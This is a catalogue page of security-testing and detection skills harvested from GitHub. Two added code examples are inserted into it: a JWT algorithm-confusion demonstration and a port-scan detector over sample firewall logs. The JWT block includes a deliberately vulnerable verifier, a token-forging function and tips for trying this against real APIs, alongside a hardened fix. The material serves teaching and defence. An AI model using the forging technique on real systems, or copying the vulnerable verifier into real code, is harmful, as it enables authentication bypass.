GitHub
Skills harvested from GitHub repositories
14810 skills available
exploiting-jwt-algorithm-confusion-attack
Testing APIs that use RS256 (asymmetric) JWT tokens for authentication to check for algorithm downgrade to HS256 Assessi...
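The downgrade named above, worked through in code as an added example (it is not part of the harvested skill and not any project's library): a verifier that trusts the `alg` header will, on `alg=HS256`, feed the RSA public key material it holds into HMAC, so anyone who can fetch that public key can mint tokens it accepts. The RSA key pair, the `PUBLIC_KEY_PEM` text and the `encode`/`verify_*` helpers are all constructed for this demonstration; the toy RSA uses tiny primes and no padding and exists only so the block runs offline.

```python
import base64
import hashlib
import hmac
import json

# Toy RSA key pair, constructed for this example (tiny primes, no padding;
# never use for anything real). Signing is pow(h, D, N), verification pow(s, E, N).
P, Q = 104729, 1299709
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))

# The server's published public key as text. This exact byte string is what
# the attacker reuses as the HMAC secret once the header says HS256.
PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    + base64.b64encode(json.dumps({"n": N, "e": E}).encode()).decode()
    + "\n-----END PUBLIC KEY-----\n"
)


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _digest_int(signing_input: bytes) -> int:
    # Hash of header.payload, reduced mod N so the toy RSA can sign it.
    return int.from_bytes(hashlib.sha256(signing_input).digest(), "big") % N


def rs256_sign(signing_input: bytes) -> bytes:
    return pow(_digest_int(signing_input), D, N).to_bytes(8, "big")


def rs256_verify(signing_input: bytes, sig: bytes) -> bool:
    return pow(int.from_bytes(sig, "big"), E, N) == _digest_int(signing_input)


def hs256_sign(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def encode(claims: dict, alg: str, secret: bytes = b"") -> str:
    """Build a compact JWS; RS256 uses the private key D, HS256 the given secret."""
    header = b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}".encode()
    if alg == "RS256":
        sig = rs256_sign(signing_input)
    elif alg == "HS256":
        sig = hs256_sign(signing_input, secret)
    else:
        raise ValueError("unsupported alg")
    return f"{header}.{payload}.{b64url(sig)}"


def verify_vulnerable(token: str, key_material: str):
    """Trusts the alg in the header: the one configured key is used for whatever
    algorithm the token names, so with HS256 the public key text is the HMAC secret."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    signing_input = f"{h}.{p}".encode()
    sig = b64url_decode(s)
    if header.get("alg") == "RS256":
        ok = rs256_verify(signing_input, sig)
    elif header.get("alg") == "HS256":
        ok = hmac.compare_digest(hs256_sign(signing_input, key_material.encode()), sig)
    else:
        ok = False
    return json.loads(b64url_decode(p)) if ok else None


def verify_hardened(token: str, key_material: str, expected_alg: str = "RS256"):
    """Pins the algorithm server-side; the header's alg is compared, never dispatched on."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != expected_alg:
        return None
    if not rs256_verify(f"{h}.{p}".encode(), b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def forge_with_public_key(claims: dict, public_key_pem: str) -> str:
    """Attacker side: needs only the public key, signs chosen claims with HMAC."""
    return encode(claims, "HS256", public_key_pem.encode())
```

To test a real API the same way, the forged token must use the public key bytes exactly as the server's library holds them (PEM with trailing newline, or the raw x5c/JWK form), which is why exploiting this in practice usually means trying several serialisations of the same key. The fix on the server side is the one `verify_hardened` shows: pass an explicit allow-list of algorithms to the JWT library and keep HMAC and RSA keys in separate code paths.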
exploiting-ipv6-vulnerabilities
Testing whether dual-stack networks have consistent security controls for both IPv4 and IPv6 traffic Demonstrating risks...
exploiting-insecure-deserialization
During authorized penetration tests when applications process serialized data (cookies, API parameters, message queues) ...
exploiting-http-request-smuggling
During authorized penetration tests when the application sits behind a reverse proxy, load balancer, or CDN When testing...
exploiting-broken-function-level-authorization
Testing whether regular users can access administrative API endpoints by direct URL access Assessing APIs for vertical p...
exploiting-api-injection-vulnerabilities
Testing API endpoints that accept user input for database queries, system commands, or external requests Assessing APIs ...
exploiting-active-directory-certificate-services-esc1
ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate...
executing-active-directory-attack-simulation
Assessing the security of an Active Directory domain and forest against common and advanced attack techniques Identifyin...
eradicating-malware-from-infected-systems
Malware infection confirmed and containment is in place Forensic investigation has identified all persistence mechanisms...
detecting-t1548-abuse-elevation-control-mechanism
When hunting for privilege escalation via UAC bypass in Windows environments After threat intelligence indicates use of ...
detecting-t1055-process-injection-with-sysmon
When hunting for defense evasion techniques that hide malicious code inside legitimate processes After EDR alerts for su...
detecting-t1003-credential-dumping-with-edr
When hunting for credential theft activity in the environment After compromise indicators suggest attacker has elevated ...
detecting-suspicious-oauth-application-consent
Illicit consent grant attacks trick users into granting excessive permissions to malicious OAuth applications in Azure A...
detecting-spearphishing-with-email-gateway
Spearphishing targets specific individuals using personalized, researched content that bypasses generic spam filters. Em...
detecting-shadow-api-endpoints
Shadow APIs are API endpoints operating within an organization's environment that are not tracked, documented, or secure...
detecting-s3-data-exfiltration-attempts
When GuardDuty detects anomalous S3 access patterns such as bulk downloads from unusual IPs When investigating suspected...
detecting-rootkit-activity
System shows signs of compromise but standard tools (Task Manager, netstat) show nothing abnormal Antivirus/EDR detects ...
detecting-ransomware-precursors-in-network
Building detection rules for pre-ransomware network activity (the average time from Cobalt Strike deployment to encrypti...
detecting-port-scanning-with-fail2ban
Automatically blocking IP addresses that perform port scans against internet-facing servers Defending SSH, HTTP, FTP, an...
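The detection behind that kind of blocking, as an added example that is not part of the harvested skill: dropped-packet log lines from the firewall are parsed and a source is flagged when it touches many distinct destination ports within a short window. The `PORTSCAN:` prefix is a hypothetical iptables `--log-prefix`, the log lines are constructed, and the year in the parsed timestamp is assumed because syslog lines carry none.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the shape of iptables LOG output under syslog.
# "PORTSCAN:" stands in for whatever --log-prefix the LOG rule uses; the hosts
# and ports are illustrative only.
SAMPLE_LOG = """\
Mar 12 10:00:01 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=21 SYN
Mar 12 10:00:01 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=22 SYN
Mar 12 10:00:02 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=23 SYN
Mar 12 10:00:02 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40004 DPT=25 SYN
Mar 12 10:00:03 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40005 DPT=80 SYN
Mar 12 10:00:03 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=40006 DPT=443 SYN
Mar 12 10:00:05 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=198.51.100.4 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=22 SYN
Mar 12 10:00:09 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=198.51.100.4 DST=192.0.2.10 PROTO=TCP SPT=51001 DPT=22 SYN
Mar 12 10:05:00 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP SPT=52000 DPT=8080 SYN
Mar 12 10:20:00 edge kernel: PORTSCAN: IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP SPT=52001 DPT=8443 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: PORTSCAN: .*?"
    r"SRC=(?P<src>\d+\.\d+\.\d+\.\d+) .*?PROTO=(?P<proto>\w+) .*?DPT=(?P<dpt>\d+)"
)


def parse(log_text: str, year: int = 2024):
    """Yield (timestamp, src, proto, dport) for each matching LOG line.
    The year is assumed: syslog timestamps do not carry one."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["proto"], int(m["dpt"])))
    return events


def find_port_scanners(log_text: str, min_ports: int = 5, window_seconds: int = 60):
    """Return {src: sorted distinct ports probed} for every source that hits at
    least min_ports distinct destination ports inside any window_seconds span.
    Counting distinct ports rather than packets is what keeps a client retrying
    one closed service from looking like a scanner."""
    by_src = defaultdict(list)
    for ts, src, _proto, dpt in parse(log_text):
        by_src[src].append((ts, dpt))
    offenders = {}
    for src, hits in by_src.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it fits within window_seconds.
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({p for _, p in hits[start:end + 1]}) >= min_ports:
                offenders[src] = sorted({p for _, p in hits})
                break
    return offenders
```

fail2ban itself cannot count distinct ports: a filter whose `failregex` matches these lines with `<HOST>` in place of the `SRC=` address will ban a source after `maxretry` dropped packets within `findtime`, whatever ports they hit. That is simpler to deploy but bans the retrying client above just as readily as the scanner, so set `maxretry` high enough that a handful of stray packets to one closed port does not trip it.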
detecting-pass-the-hash-attacks
When proactively hunting for indicators of pass-the-hash attacks in the environment After threat intelligence ...
detecting-ntlm-relay-with-event-correlation
Authorized Testing Disclaimer: The offensive techniques and attack simulations described in this skill are intended excl...
detecting-network-scanning-with-ids-signatures
Network scanning is typically the first phase of an attack, where adversaries enumerate live hosts, open ports, running ...
detecting-network-anomalies-with-zeek
Deploying passive network security monitoring at key network choke points for continuous visibility Generating structure...
detecting-misconfigured-azure-storage
When performing a security audit of Azure Storage accounts across subscriptions When responding to Microsoft Defender fo...